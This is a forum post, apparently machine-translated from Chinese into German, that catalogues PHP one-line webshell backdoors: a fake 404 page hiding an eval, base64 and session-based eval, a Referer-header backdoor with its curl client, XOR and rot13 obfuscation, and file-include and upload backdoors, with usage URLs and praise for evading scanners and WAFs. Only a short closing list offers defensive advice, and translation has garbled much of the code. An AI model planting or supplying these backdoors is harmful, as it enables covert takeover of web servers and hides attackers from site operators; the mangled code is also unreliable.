Wir behandeln diese PHP-Backdoor-Programme mit einer Lernmentalität, und viel PHP-Backdoor-Code zeigt uns, wie gut gemeint Programmierer sind.
Mächtige PHP-Hintertür in einem Satz
Diese Art von Hintertür ermöglicht es Websites,Serveradministratoren sind sehr problematisch und müssen oft die Methoden ändern, um verschiedene Erkennungen durchzuführen, und viele neue Schreibtechniken können nicht entdeckt und mit normalen Erkennungsmethoden nicht umgesetzt werden.
Heute zählen wir einige interessante PHP-Trojaner.
1. PHP-Ponys mit 404 Seiten ausstecken:
[mw_shl_code=php, wahr] <!DOCTYPE HTML ÖFFENTLICH "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Nicht gefunden</title>
</head><body>
<h1>Nicht gefunden</h1>
<p>Die angeforderte URL wurde auf diesem Server nicht gefunden.</p>
</body></html>
<?php
@preg_replace("/[Pageerror]/e",$_POST['error'],"saft");
header ('HTTP/1.1 404 nicht gefunden');
?>[/mw_shl_code]
Die 404-Seite ist eine häufig verwendete Datei auf der Website, und nur wenige Leute werden sie überprüfen und ändern, nachdem sie allgemein empfohlen wurde, sodass wir sie nutzen können, um die Hintertür zu verbergen.
2. Featureloses, verstecktes PHP in einem Satz:
[mw_shl_code=php,true]<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a');
?>[/mw_shl_code]
Weisen Sie $_POST['Code'] $_SESSION['theCode'] zu und führen dann $_SESSION['theCode' aus], wobei hervorgehoben wird, dass kein Signaturcode vorhanden ist.
Wenn Sie ein Scan-Tool verwenden, um den Code zu überprüfen, wird das Ziel nicht alarmiert und erreicht.
3. Super unauffällige PHP-Hintertür:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
Die GET-Funktion allein stellt einen Trojaner dar;
Wie man verwendet:
[mw_shl_code=php, wahr]
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Nach der Ausführung erzeugt das aktuelle Verzeichnis c.php einen Satz-Trojaner; wenn der Parameter A bewertet wird, fehlschlägt der Fehler Trojan-Generierung fehl, und wenn er assert wird, meldet er ebenfalls einen Fehler, erzeugt jedoch ein Trojanisches Pferd, das nicht unterschätzt werden darf.
Level-Anfrage, Code zum Ausführen von PHP-Backdoor:
Diese Methode wird mit zwei Dateien, Datei 1, implementiert
[mw_shl_code=php,true]<?php
//1.php
header('Content-type:text/html; charset=UTF-8′);
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10'&& count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", Implode(array_slice($a, 6)))));
}
?>[/mw_shl_code]
Dokument 2
[mw_shl_code=php,true]<?php
//2.php
header('Content-type:text/html; charset=UTF-8′);
//要执行的代码
$code= <<<CODE
phpinfo();
CODE;
//进行base64编码
$code= base64_encode($code);
//构造referer字符串
$referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url= 'http://localhost/test1/1.php';
$ch= curl_init();
$options= Array(
CURLOPT_URL => $url,
CURLOPT_HEADER => FALSCH,
CURLOPT_RETURNTRANSFER => WAHR,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echocurl_exec($ch);
?>[/mw_shl_code]
Führe base64-kodierten Code durch die HTTP_REFERER in der HTTP-Anfrage aus, um den Backdoor-Effekt zu erzielen.
Es ist gut, diese Idee zu nutzen, um WAF zu umgehen.
4.PHP Backdoor-Generator-Tool Weevely
weevely ist eine PHP-spezifischeWebshell-freie Software kann verwendet werden, um eine Verbindungsshell ähnlich wie Telnet zu simulieren. Weevely wird üblicherweise für die Ausnutzung von Webprogrammen, das Verstecken von Hintertüren oder für telnet-ähnliche Methoden anstelle von webseitenbasierter Verwaltung eingesetzt. Der serverseitige PHP-Code, der von Weevely generiert wird, ist base64-codiert, sodass er gängige Antivirensoftware und IDS täuschen kann. Sobald du den serverseitigen Code hochgeladen hast, kannst du ihn normalerweise direkt über Weevely laufen lassen.
Die im Backdoor verwendeten Funktionen sind häufig verwendete String-Verarbeitungsfunktionen, und Funktionen wie Eval und System, die als Inspektionsregeln dienen, erscheinen nicht direkt im Code, sodass die Backdoor-Datei die Überprüfung des Backdoor-Suchwerkzeugs umgehen kann. Ein Scannen mit dem Web-Backdoor-Erkennungstool der Dark-Gruppe zeigt, dass die Datei nicht bedroht ist.
Das Obige ist eine allgemeine Einleitung, und die relevanten Anwendungsmethoden werden hier nicht vorgestellt, sondern eine einfache wissenschaftliche Popularisierung.
4. Drei deformierte Ein-Satz-PHP-Trojaner
Der erste:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
Der zweite
[mw_shl_code=php,true]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ �”). ($_[+“”]|“”). ($_[+“”]^“�”);
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Schreibe http://site/2.php?_=assert&__=eval($_POST['pass']) Passwort ins Küchenmesser ist pass.
Wenn du die zusätzlichen Daten des Küchenmessers verwendest, ist sie besser versteckt, oder du kannst andere Injektionswerkzeuge verwenden, weil sie post-eingereicht werden.
Der dritte
[mw_shl_code=php, wahr] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'hinzufügen'); [/mw_shl_code]
str_rot13 ("riny") ist die kodierte Bewertung, die Schlüsselwörter komplett vermeidet, ohne die Wirkung zu verlieren, sodass die Menschen Blut erbrechen!
5. Abschließend listen Sie einige fortgeschrittene Hintertüren für PHP-Trojaner auf:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh("/[discuz]/e",$_POST['h'],"Zugriff"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid'];
include($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”;
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid("/[discuz]/e",$_POST['h'],"Zugriff"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Zusammenfassend lässt sich sagen, dass diese PHP-Hintertüren als abgeschlossen beschrieben werden – wenn Sie nicht aufpassen, werden Sie definitiv getäuscht – und was ist heute die oberste Priorität unseres Artikels? Die wichtigsten Punkte finden Sie in der untenstehenden Zusammenfassung!
Wie man mit einer ein-Satz-Hintertür von PHP umgeht:
Wir betonen einige wichtige Punkte, und wenn Sie diesen Artikel gelesen haben, glaube ich, dass Sie kein Laie sind, daher werde ich nicht ausschweifen:
- Achte auf die Sicherheit beim Schreiben von PHP-Programmen
- Server-Logdateien sollten häufig gelesen und gesichert werden
- Strenge Berechtigungszuweisung für jede Seite
- Häufige Batch-Sicherheitsüberprüfungen dynamischer Dateien und Verzeichnisse
- Erfahren Sie, wie man manuelle Antiviren-Untersuchung und -Untersuchung von Verhaltensurteilen durchführt
- Bleiben Sie dran oder infiltrieren Sie ein aktives Cybersecurity-Camp
- Sogar eine Funktion kann als Regel für die hierarchische Verarbeitung der Serverumgebung verwendet werden
Wir sind der Meinung, dass wir, wenn es mehr Seiten zu verwalten und eine große Datenmenge gibt, vernünftigerweise einige Hilfswerkzeuge einsetzen sollten, aber wir sollten uns nicht vollständig auf diese Werkzeuge verlassen, die Technologie wird ständig aktualisiert und verbessert, das Wichtigste ist, dass man das Denken dieser mächtigen Backdoor-Leute lernt und versteht, und die Rollenübertragung kann einem größeren Fortschritt bringen.
|
Veröffentlicht am 01.12.2014 21:41:13
